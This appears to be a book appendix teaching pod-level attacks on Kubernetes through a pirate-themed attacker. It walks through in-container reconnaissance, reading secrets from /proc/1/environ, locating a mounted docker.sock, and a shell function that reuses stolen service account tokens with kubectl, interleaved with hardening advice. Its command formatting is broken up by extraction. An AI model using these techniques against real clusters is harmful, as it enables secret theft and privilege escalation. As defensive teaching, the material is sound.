This appendix is a hands-on exploration of attacks on the pod level, as we discussed in Chapter 2.
Dread cyberpirate Captain Hashjack can now execute code inside a pod remotely and they will start to explore its configuration to see what else can be accessed.
Like all good pirates, Captain Hashjack has a treasure map, but this is no ordinary map with a clearly defined destination. Instead, this map describes only the journey, with no guarantee of reaching a conclusion. It’s a cluster attack map, as shown in Figure A-1, and it is used to guide us through the rest of the appendix. And now, from inside the pod, it’s time to explore.
Securing any system is difficult. The best way to find vulnerabilities and misconfiguration is to methodically observe your environment, build up a library of your own attacks and patterns, and not give up!
Upon entering a new environment, a little basic checking may lead to useful discoveries.
The first thing Hashjack does is check to see what kind of container they’re in. Checking /proc/self/cgroup
often
gives a clue, and here they can see they’re in Kubernetes from the clue /kubepods/besteffort/pod8a6fa26b-...
:
adversary@hashjack-5ddf66bb7b-9sssx:/$
cat /proc/self/cgroup 11:memory:/kubepods/besteffort/pod8a6fa26b-.../f3d7b09d9c3a1ab10cf88b3956... 10:cpu,cpuacct:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b... 9:blkio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b3956704... 8:net_cls,net_prio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10c... 7:perf_event:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39... 6:freezer:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567... 5:pids:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567048... 4:cpuset:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b395670... 3:hugetlb:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567... 2:devices:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567... 1:name=
systemd:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...
Next, they might check for capabilities with their process’s status entry in /proc/self/status:
Name: cat State: R (running) Tgid: 278 Ngid: 0 Pid: 278 PPid: 259 TracerPid: 0 Uid: 1001 1001 1001 1001 Gid: 0 0 0 0 FDSize: 256 Groups: NStgid: 278 NSpid: 278 NSpgid: 278 NSsid: 259 VmPeak: 2432 kB VmSize: 2432 kB VmLck: 0 kB VmPin: 0 kB VmHWM: 752 kB VmRSS: 752 kB VmData: 312 kB VmStk: 132 kB VmExe: 28 kB VmLib: 1424 kB VmPTE: 24 kB VmPMD: 12 kB VmSwap: 0 kB HugetlbPages: 0 kB Threads: 1 SigQ: 0/15738 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000000000000 SigIgn: 0000000000000000 SigCgt: 0000000000000000 CapInh: 00000000a80425fb CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 00000000a80425fb CapAmb: 0000000000000000 Seccomp: 0 Speculation_Store_Bypass: vulnerable Cpus_allowed: 0003 Cpus_allowed_list: 0-1 Mems_allowed: 00000000,00000001 Mems_allowed_list: 0 voluntary_ctxt_switches: 0 nonvoluntary_ctxt_switches: 1
The kernel freely provides this information in order to help Linux applications, and an attacker in a container can use it to their advantage. Interesting entries can be grepped out (notice we’re root below):
root@hack:~[
0]
$
grep -E\
'(Uid|CoreDumping|Seccomp|NoNewPrivs|Cap[A-Za-z]+):'
/proc/self/status Uid:0
0
0
0 CoreDumping: 0 CapInh: 0000003fffffffff CapPrm: 0000003fffffffff CapEff: 0000003fffffffff CapBnd: 0000003fffffffff CapAmb: 0000000000000000 NoNewPrivs: 0 Seccomp: 0
The capabilities are not very readable, and need to be decoded:
root@hack:~[
0]
$
capsh --decode=
0000003fffffffff0x0000003fffffffff
=
cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner, cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable, cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw, cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot, cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice, cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease, cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override, cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
You can also use the capsh --print
command to show capabilities (if it’s installed), getpcaps
and filecap
(for a single process or file, respectively), pscap
(for all running processes), and captest
(for the current process’s context):
root@hack:~[
0]
$
capsh --print Current:=
cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill, cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw, cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip Boundingset
=
cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill, cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw, cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap Ambientset
=
Securebits: 00/0x0/1'
b0 secure-noroot: no(
unlocked)
secure-no-suid-fixup: no(
unlocked)
secure-keep-caps: no(
unlocked)
secure-no-ambient-raise: no(
unlocked)
uid
=
0(
root)
gid
=
0(
root)
groups
=
1(
bin)
,2(
daemon)
,3(
sys)
,4(
adm)
,6(
disk)
,10(
wheel)
,11(
floppy)
...
A production container should never contain these debugging commands, instead only containing
production applications and code. Using static, slim, or distroless
containers
reduces the attack surface of a container by limiting an attacker’s access to useful information. This is also why you
should limit the availability of network-capable applications like curl
and wget
where possible, as well as any
interpreters with network libraries that can be used to pull external tools into a running container.
You may prefer to run Jess Frazelle’s amicontained, which runs these checks quickly and also handily detects capability, seccomp, and LSM configuration.
This command requires internet access, which is another privilege that production workloads should not be afforded unless required for production operation. Air-gapped (fully offline) clusters afford greater security from this type of attack at the cost of administrative overhead.
Let’s use amicontained
:
root@hack:~
[
0
]
$
export
AMICONTAINED_SHA256
=
"d8c49e2cf44ee9668219acd092e\ d961fc1aa420a6e036e0822d7a31033776c9f"
root@hack:~
[
0
]
$
curl
-fSL
\
"https://github.com/genuinetools/amicontained/releases/download/v0.4.9/\ amicontained-linux-amd64"
\
-o
"/tmp/amicontained"
\
&&
echo
"
${
AMICONTAINED_SHA256
}
/tmp/amicontained
"
|
sha256sum
-c
-
\
&&
chmod
a+x
"/tmp/amicontained"
root@hack:~
[
0
]
$
/tmp/amicontained
Container
Runtime:
kube
Has
Namespaces:
pid:
true
user:
false
AppArmor
Profile:
docker-default
(
enforce
)
Capabilities:
BOUNDING
->
chown
dac_override
fowner
fsetid
kill
setgid
setuid
setpcap
net_bind_service
net_raw
sys_chroot
mknod
audit_write
setfcap
Seccomp:
disabled
Blocked
system
calls
(
26
)
:
SYSLOG
SETUID
SETSID
SETREUID
SETGROUPS
SETRESUID
VHANGUP
PIVOT_ROOT
ACCT
SETTIMEOFDAY
UMOUNT2
SWAPON
SWAPOFF
REBOOT
SETHOSTNAME
SETDOMAINNAME
INIT_MODULE
DELETE_MODULE
LOOKUP_DCOOKIE
KEXEC_LOAD
FUTIMESAT
UTIMENSAT
FANOTIFY_INIT
OPEN_BY_HANDLE_AT
FINIT_MODULE
KEXEC_FILE_LOAD
Looking
for
Docker.sock
Export the sha256sum for verification.
Download and check the sha256sum.
We installed to a non-standard path to evade immutable filesystems, so we run a fully-qualified path
Jackpot! There’s a lot of information available about the security configuration of a container—from within it.
We can check our cgroup
limits on the filesystem too:
root@hack:~[
0]
$
free -m total used free shared buff/cache available Mem:3950
334
1473
6
2142
3327 Swap:0
0
0
free -m
uses host-level APIs available to all processes and has not been updated to run with cgroups
. Check the system
API to see the process’s actual cgroup
limits:
root@host:~[
0]
$
docker run -it --memory=
4MB sublimino/hack\
cat /sys/fs/cgroup/memory/memory.limit_in_bytes 4194304
Is this tremendously useful to an attacker? Not really. Exhausting the memory of a process and causing denial of service
is a basic attack (although fork bombs are elegantly
scripted Bash poetry). Nevertheless, you should set cgroups
to prevent DoS of applications in a
container or pod (which support individual configuration). Cgroups are not a security boundary, and cgroups v1 can be
escaped from a privileged pod, as nicely demonstrated in Figure A-2.
cgroups v1
container breakoutThe more secure, and rootless-prerequisite, cgroups v2
should be the default in most Linux installations
from 2022.
Denial of service is more likely to be an application fault than an attack—serious DDoS (internet-based distributed denial of service) should be handled by networking equipment in front of the cluster for bandwidth and mitigation.
In September of 2017 Google fought off a 2.54 Tbps DDoS. This type of traffic is dropped by network router hardware at Ingress to prevent overwhelming internal systems.
Kubernetes sets some useful environment variables into each container in a pod:
root@frontened:/frontend[
0]
$
env|
grep -E'(KUBERNETES|[^_]SERVICE)_PORT='
|
sortADSERVICE_PORT
=
tcp://10.3.253.186:9555CARTSERVICE_PORT
=
tcp://10.3.251.123:7070CHECKOUTSERVICE_PORT
=
tcp://10.3.240.26:5050CURRENCYSERVICE_PORT
=
tcp://10.3.240.14:7000EMAILSERVICE_PORT
=
tcp://10.3.242.14:5000KUBERNETES_PORT
=
tcp://10.3.240.1:443PAYMENTSERVICE_PORT
=
tcp://10.3.248.231:50051PRODUCTCATALOGSERVICE_PORT
=
tcp://10.3.250.74:3550RECOMMENDATIONSERVICE_PORT
=
tcp://10.3.254.65:8080SHIPPINGSERVICE_PORT
=
tcp://10.3.242.42:50051
It is easy for an application to read its configuration from environment variables, and the 12 Factor App suggests that config and Secrets should be set in the environment. Environment variables are not a safe place to store Secrets as they can be read easily from the PID namespace by a process, user, or malicious code.
You can see a process’s environment as root, or the same user. Check PID 1 with a null-byte translation:
root@frontened:/frontend[
0]
$
tr'\0'
'\n'
< /proc/1/environHOSTNAME
=
9c7e824ed321PWD
=
/# ...
Even if no compromise takes place, many applications dump their environment when they crash, leaking Secrets to anyone who can access the logging system.
Kubernetes Secrets should not be mounted as environment variables.
As well as being easy to collect from a parent process if an attacker has remote code execution, Kubernetes container environment variables are not updated after container creation: if the Secret is updated by the API server, the environment variable keeps the same value.
The safer option is to use a well-known path, and mount a Secret tmpfs
volume into the container, so an adversary has
to guess or find the Secret file path, which is less likely to be automated by an attacker. Mounted Secrets are
updated automatically, after a kubelet
sync period and cache propagation delay.
Here’s an example of a Secret mounted into the path /etc/foo:
apiVersion
:
v1
kind
:
Pod
metadata
:
name
:
mypod
spec
:
containers
:
-
name
:
mypod
image
:
redis
volumeMounts
:
-
name
:
foo
mountPath
:
"/etc/foo"
readOnly
:
true
volumes
:
-
name
:
foo
secret
:
secretName
:
mysecret
Mounting Secrets as files protects against information leakage and ensures adversaries like Captain Hashjack don’t stumble across production secrets when diving through stolen application logs.
A fastidious explorer leaves no sea uncharted, and to Captain Hashjack attacking the filesystem is no different.
Checking for anything external added to the mount namespace is the first port of call, for which common tools like
mount
and df
can be used.
Every external device, filesystem, socket, or entity shared into a container increases a risk of container breakout through exploit or misconfiguration. Containers are at their most secure when they contain only the bare essentials for operation, and share nothing with each other or the underlying host.
Let’s start with a search of the filesystem mount points for a common container filesystem driver, overlayfs
. This may
leak information about the type of container runtime that has configured the filesystem:
root@test-db-client-pod:~[
0]
$
mount|
grep overlay overlay on /type
overlay(
rw,relatime,lowerdir
=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/315/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/314/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/313/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/312/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/311/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/310/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/309/fs: /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/308/fs,upperdir
=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/fs,workdir
=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/work)
We can see that the underlying container runtime is using a file path containing the name containerd
, and the location
of the container’s filesystem on the host disk is
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs. There are multiple layered directories
listed, and these are combined into a single filesystem at runtime by overlayfs
.
These paths are fingerprints of the container runtime’s default configuration, and runc
leaks its identity in the same
way, with a different filesystem layout:
root@dbe6633a6c94:/# mount|
grep overlay overlay on /type
overlay(
rw,relatime,lowerdir=
/var/lib/docker/overlay2/l/3PTJCBKLNC2V5MRAEF3AU6EDMS: /var/lib/docker/overlay2/l/SAJGPHO7UFXGYFRMGNJPUOXSQ5: /var/lib/docker/overlay2/l/4CZQ74RFDNSDSHQB6CTY6CLW7H,upperdir
=
/var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/diff,workdir
=
/var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/work)
Run the df
command to see if there are any Secrets mounted into the container. In this example no external entities are
mounted into the container:
root@test-db-client-pod:~[
0]
$
df Filesystem Type Size Used Avail Use% Mounted on overlay overlay 95G 6.6G 88G 7% / tmpfs tmpfs 64M0
64M 0% /dev tmpfs tmpfs 7.1G0
7.1G 0% /sys/fs/cgroup /dev/sda1 ext4 95G 6.6G 88G 7% /etc/hosts shm tmpfs 64M0
64M 0% /dev/shm tmpfs tmpfs 7.1G0
7.1G 0% /proc/acpi tmpfs tmpfs 7.1G0
7.1G 0% /proc/scsi tmpfs tmpfs 7.1G0
7.1G 0% /sys/firmware
We can see that tmpfs
is used for many different mounts, and some mounts are masking host filesystems
in /proc and /sys
. The container runtime performs additional masking on the special files in those directories.
Potentially interesting mounts in a vulnerable container filesytem may contain host mounted Secrets and sockets, especially the infamous Docker socket, and Kubernetes service accounts that may have RBAC authorization to escalate privilege, or enable further attacks:
root@test-db-client-pod:~[
0]
$
df Filesystem Type ... Use% Mounted on tmpfs tmpfs ... 1% /etc/secret-volume tmpfs tmpfs ... 1% /run/docker.sock tmpfs tmpfs ... 1% /run/secrets/kubernetes.io/serviceaccount
The easiest and most convenient of all container breakouts is the /var/run/docker.sock mount points: the container runtime’s socket from the host, that gives access to the Docker daemon running on the host. If those new containers are privileged, they can be used to trivially “escape” the container namespace and access the underlying host as root, as we saw previously in this chapter.
Other appealing targets include the Kubernetes service account tokens under /var/run/secrets/kubernetes.io/serviceaccount, or writable host mounted directories like /etc/secret-volume. Any of these could lead to a breakout, or assist a pivot.
Everything a kubelet
mounts into its containers is visible to the root user on the kubelet
’s host. We’ll see what the
serviceAccount
mounted at /run/secrets/kubernetes.io/serviceaccount looks like later, and we investigated what to do
with stolen serviceAccount
credentials in Chapter 8.
From within a pod kubectl
uses the credentials in /run/secrets/kubernetes.io/serviceaccount by default. From the kubelet
host these files are mounted under /var/lib/kubelet/pods/123e4567-e89b-12d3-a456-426614174000/volumes/kubernetes.io~secret/my-pod-token-7vzn2, so load
the following command into a Bash shell:
kubectl-sa-dir()
{
local
DIR
=
"
${
1
:-
}
"
;
local
API_SERVER
=
"
${
2
:-
kubernetes
.default
}
"
;
kubectl configset
-cluster tmpk8s --server=
"https://
${
API_SERVER
}
"
\
--certificate-authority=
"
${
DIR
}
/ca.crt"
;
kubectl configset
-context tmpk8s --cluster=
tmpk8s;
kubectl configset
-credentials tmpk8s --token=
"
$(
<${
DIR
}
/token)
"
;
kubectl configset
-context tmpk8s --user=
tmpk8s;
kubectl config use-context tmpk8s;
kubectl get secrets -n null 2>&
1
|
sed -E's,.*r "([^"]+).*,\1,g'
}
And run it against a directory:
root@kube-node-1:~ [0]# kubectl-sa-dir \ /var/lib/kubelet/pods/.../kubernetes.io~secret/priv-app-r4zkx/...229622223/ Cluster "tmpk8s" set. Context "tmpk8s" created. User "tmpk8s" set. Context "tmpk8s" modified. Switched to context "tmpk8s". apiVersion: v1 clusters: - cluster: certificate-authority: \ /var/lib/kubelet/pods/.../kubernetes.io~secret/.../...229622223/ca.crt server: https://10.0.1.1:6443 name: tmpk8s # ... system:serviceaccount:kube-system:priv-app
You’re now able to use the system:serviceaccount:kube-system:priv-app
service account (SA) more easily with
kubectl
as it’s configured in your ~/.kube/config. An attacker can do the same thing—hostile root access to
Kubernetes nodes reveals all its Secrets!
CSI storage interfaces and host filesystem mounts both pose a security risk if others have access to them. We explore external storage, the Container Storage Interface (CSI), and other mounts in greater detail in the Chapter 6.
What else is there mounted that might catch an adversary’s treasure-hungry gaze? Let’s explore further.
The Kubernetes hostPath
volume type mounts a filesystem path from the host into the container, which may be useful for
some applications. /var/log is a popular mount point, so the host’s journal process collects container syslog events.
HostPath
volumes should be avoided when possible as they present many risks. Best practice is to scope to only the
needed file or directory using the ReadOnly
mount flag.
Other use cases for hostPath
mounts include persistence for datastores in the pod or hosting static data, libraries,
and caches.
Using host disks or permanently attaching storage to a node creates a coupling between workloads and the underlying node, as the workloads must be restarted on that node in order to function properly. This makes scaling and resilience much more difficult.
Host mounts can be dangerous if a symlink is created inside the container that is unintentionally resolved on the host filesystem. This happened in CVE-2017–1002101, where a bug in the symbolic link–handling code allowed an adversary inside a container to explore the host mounted filesystem that the mount point was on.
Mounting of sockets from the host into the container is also a popular hostMount
use case, which allows a client
inside the container to run commands against a server on the host. This is an easy path to container breakout by
starting a new privileged container on the host and escaping.
Mounting sensitive directories or files from the host may also provide an opportunity to pivot if they can be used for network services.
hostPath
volumes are writeable on the host partition outside the container, and are always mounted on the host
filesystem as owned by root:root
. For this reason, a nonroot user should always be used inside the container, and
filesystem permissions should always be configured on the host if write access is needed inside the container.
If you are restricting hostPath
access to specific directories with admission controllers, those volumeMounts
must
be readOnly
, otherwise new symlinks can be used to traverse the host filesystem.
Ultimately data is the lifeblood of your business, and managing state is hard. An attacker will be looking to gather, exfiltrate, and cryptolock any data they can find in your systems. Consuming an external service (such as an object store or database hosted outside your cluster) to persist data is often the most resilient and scalable way to secure a system—however, for high-bandwidth or low-latency applications this may be impossible.
For everything else, cloud provider or internal service integrations remove the link between a workload and the underlying host, which makes scaling, upgrades, and system deployments much easier.
Managed services and dedicated infrastructure clusters are an easier cluster security abstraction to reason about, and we talk more about them in Chapter 7.
A hostile container is one that is under an attacker’s control. It may be created by an attacker with Kubernetes access
(perhaps the kubelet
, or API server), or a container image with automated exploit code embedded (for example, a
“trojanized” image from dockerscan that can start a reverse shell in a legitimate
container to give attackers access to your production systems), or have been accessed by a remote adversary
post-deployment.
What about the filesystem of a hostile container image? If Captain Hashjack can force Kubernetes to run a container they
have built or corrupted, they may try to attack the orchestrator or container, runtimes, or clients (such as kubectl
).
One attack (CVE-2019-16884) involves a container image that defines
a VOLUME
over a directory AppArmor uses for configuration, essentially disabling it at container runtime:
mkdir -p rootfs/proc/self/{
attr,fd}
touch rootfs/proc/self/{
status,attr/exec}
touch rootfs/proc/self/fd/{
4,5}
This may be used as part of a further attack on the system, but as AppArmor is unlikely to be the only layer of defense, it is not as serious as it may appear.
Another dangerous container image is one used by a /proc/self/exe breakout in
CVE-2019-5736. This exploit requires a container with a maliciously
linked ENTRYPOINT
, so can’t be run in a container that has already started.
As these attacks show, unless a container is built from trusted components, it should be considered untrusted to defend against further unknown attacks such as this.
A collection of kubectl cp
CVEs
(CVE-2018-1002100,
CVE-2019-11249) require a malicious tar binary inside the
container. The vulnerability stems from kubectl
trusting the input it receives from the scp
and tar
process inside
the container, which can be manipulated to overwrite files on the machine the kubectl
binary is being run on.
The danger of the /proc/self/exe breakout in CVE-2019-5736 is that a
hostile container process can overwrite the runc
binary on the host. That runc
binary is owned by root, but as it is
also executed by root on the host (as most container runtimes need some root capabilities), it can be overwritten from
inside the container in this attack. This is because the container process is a child of runc
, and this exploit uses
the permission runc
has to overwrite itself.
Protecting the host from privileged container processes is best achieved by removing root privileges from the container
runtime. Both runc
and Podman can run in rootless mode, which we explore in Chapter 3.
The root user has many special privileges as a result of years of kernel development that assumed only one “root” user.
To limit the impact of RCE to the container, pod, and host, applications inside a container should not be run as root,
and their capabilities should be dropped, without the ability to gain privileges by setting the
allowPrivilegeEscalation
securityContext
field to false
(which sets the no_new_privs
flag on the container process).